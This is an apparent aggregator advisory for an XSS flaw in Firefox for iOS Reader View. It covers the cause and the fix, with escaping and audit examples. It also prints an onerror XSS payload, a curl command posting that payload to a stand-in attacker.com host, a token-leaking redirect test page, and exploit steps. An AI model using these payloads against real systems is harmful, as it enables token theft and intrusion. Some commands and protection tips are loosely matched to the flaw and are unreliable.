Firefox for iOS, Cross‑Site Scripting (XSS), CVE‑2026‑9309 (Medium) -DC-Jun2026-172

CVE‑2026‑9309 is a vulnerability in the Reader View component of Firefox for iOS that stems from improper HTML tag escaping when processing JSON‑LD metadata. JSON‑LD is a structured data format used by web pages to embed machine‑readable information, such as titles, authors, and descriptions. When Firefox for iOS loads a page that contains JSON‑LD data and the user switches to Reader View, the browser parses this metadata to enhance the reading experience. However, due to a failure to properly escape or sanitize HTML tags within the JSON‑LD content, an attacker can inject arbitrary markup. This injected markup is then interpreted by the Reader View engine instead of being treated as plain text, effectively breaking out of the intended data context and altering the behaviour of Reader View.

The impact is not limited to visual changes; the same injection vector can be used to manipulate how the browser handles certain UI elements or internal navigation flows. Specifically, a maliciously crafted page can cause Reader View to leak sensitive URL parameters that belong to internal pages. These parameters may include session identifiers, authentication tokens, or other values that are normally not exposed to external origins. Once an attacker obtains those parameters, they can craft a request that targets an internal origin (e.g., about: pages, internal settings, or privileged web views). Because the leaked parameters are embedded in a context that the browser trusts, the attacker can achieve arbitrary JavaScript execution within that internal origin. This effectively bypasses the same‑origin policy (SOP) and allows the attacker to read local data, invoke internal APIs, or further escalate privileges.

The vulnerability was introduced in an unspecified earlier version and remained present until it was addressed in Firefox for iOS version 151.2. No user interaction beyond visiting a malicious web page and activating Reader View is required.

The root cause lies in the lack of output encoding for JSON‑LD strings that contain HTML‑special characters such as <, >, &, and quotes. A typical vulnerable code path might look like: `readerView.insertHTML(jsonldData)` without prior escaping. The fix in version 151.2 ensures that all JSON‑LD metadata is properly escaped using HTML entity encoding before being inserted into the DOM of Reader View, thereby neutralising any injected tags.
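The root cause and the fix described above, side by side, as an added example that is not Firefox source code: the function names and the header markup are hypothetical, and the sample metadata is constructed around the payload string quoted on this page.

```javascript
// Added illustration; function names and markup are hypothetical, not Firefox code.
const HTML_ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// HTML entity encoding for text placed in element content or quoted attributes.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// JSON-LD allows author to be a string, an object with a name, or an array of either.
function authorNames(author) {
  if (author == null) return [];
  const list = Array.isArray(author) ? author : [author];
  return list
    .map((a) => (typeof a === "string" ? a : a && a.name))
    .filter((n) => typeof n === "string");
}

// "Before": metadata strings are concatenated into markup unescaped.
function renderHeaderUnsafe(meta) {
  return `<h1>${meta.headline}</h1>` +
    `<p class="byline">${authorNames(meta.author).join(", ")}</p>` +
    `<p class="summary">${meta.description}</p>`;
}

// "After": every metadata string is entity-encoded before it reaches the markup.
function renderHeaderSafe(meta) {
  const text = (v) => escapeHtml(typeof v === "string" ? v : "");
  return `<h1>${text(meta.headline)}</h1>` +
    `<p class="byline">${authorNames(meta.author).map(escapeHtml).join(", ")}</p>` +
    `<p class="summary">${text(meta.description)}</p>`;
}

// Constructed sample metadata (not taken from a real page).
const sampleMeta = {
  "@context": "http://schema.org",
  "@type": "Article",
  headline: "Quarterly report",
  author: [{ "@type": "Person", name: "A. Writer & Co" }],
  description: "<img src=x onerror=alert('XSS')>",
};

console.log(renderHeaderUnsafe(sampleMeta)); // the tag survives as live markup
console.log(renderHeaderSafe(sampleMeta));   // the tag is rendered inert as text
```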

DailyCVE Form:

Platform: Firefox for iOS
Version: before 151.2
Vulnerability: Reader View XSS
Severity: Medium
Date: 2026‑06‑01

Prediction: Patch already released

What Undercode Say:

```bash
# Check Firefox for iOS version
defaults read org.mozilla.ios.Firefox BundleShortVersionString

# Fetch a suspicious page and extract JSON‑LD metadata
curl -s https://example.com/malicious | grep -A5 '"@context": "http://schema.org"'

# Test injection of HTML tags in JSON‑LD
curl -X POST -H "Content-Type: application/json" -d '{"Body":"<img src=x onerror=alert(1)>"}' https://attacker.com/poison

# Simulate leak of internal URL parameters via Reader View
cat <<EOF > test.html

<script>
window.location = "internal://settings?token=SECRET";
</script>

EOF
```
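A stricter form of the JSON‑LD extraction step above, for triaging a saved page: this added example (not from the original post) parses every `application/ld+json` block and reports string values that carry HTML markup. The function names and the sample page are constructed for illustration.

```javascript
// Added illustration; names are hypothetical. Flags JSON-LD string values that carry markup.
const JSONLD_BLOCK =
  /<script\b[^>]*type\s*=\s*["']application\/ld\+json["'][^>]*>([\s\S]*?)<\/script>/gi;
const MARKUP = /<[a-z\/!]/i; // start of a tag, closing tag or comment

// Recursively collect offending string values together with their property path.
function walk(node, path, out) {
  if (typeof node === "string") {
    if (MARKUP.test(node)) out.push({ path, value: node });
  } else if (Array.isArray(node)) {
    node.forEach((item, i) => walk(item, `${path}[${i}]`, out));
  } else if (node && typeof node === "object") {
    for (const [key, val] of Object.entries(node)) {
      walk(val, path ? `${path}.${key}` : key, out);
    }
  }
  return out;
}

// Returns one finding per suspicious value; unparseable blocks are reported, not skipped.
function auditJsonLd(html) {
  const findings = [];
  let index = 0;
  for (const match of html.matchAll(JSONLD_BLOCK)) {
    const block = index++;
    try {
      walk(JSON.parse(match[1]), "", []).forEach((f) => findings.push({ block, ...f }));
    } catch (err) {
      findings.push({ block, path: "(unparseable)", value: err.message });
    }
  }
  return findings;
}

// Constructed sample page (not a real site).
const samplePage = `<html><head>
<script type="application/ld+json">
{"@context":"http://schema.org","@type":"Article","headline":"Quarterly report",
 "author":[{"@type":"Person","name":"A. Writer"}],
 "description":"<img src=x onerror=alert('XSS')>"}
</script>
<script type="application/ld+json">{"@type":"WebSite","name":"Example"}</script>
</head><body><p>Body text</p></body></html>`;

console.log(auditJsonLd(samplePage));
```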

Exploit:

  1. Attacker hosts a web page that includes JSON‑LD metadata containing malicious HTML tags, e.g. "description": "<img src=x onerror=alert('XSS')>".
  2. Victim opens the page in Firefox for iOS and activates Reader View.
  3. The unescaped HTML tags are injected into Reader View’s DOM, altering its behaviour.
  4. The injected script triggers the browser to leak internal URL parameters (e.g., ?token=abc123).
  5. Attacker captures the leaked parameters via a remote listener.
  6. Attacker constructs a request to an internal origin using the leaked parameters.
  7. Arbitrary JavaScript executes in the internal origin, compromising sensitive data.

Protection:

  • Update Firefox for iOS to version 151.2 or later immediately.
  • Disable Reader View for untrusted websites in Settings → Firefox → Reader View.
  • Use a content‑blocking extension that filters JSON‑LD metadata.
  • Monitor network traffic for unexpected `about:` or `internal:` requests.

Impact:

  • Leakage of sensitive URL parameters (session tokens, API keys).
  • Arbitrary JavaScript execution in internal origins.
  • Bypass of the same‑origin policy (SOP) for internal pages.
  • Potential access to local files or privileged browser APIs.
  • Full compromise of the Firefox for iOS sandbox if escalated.

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode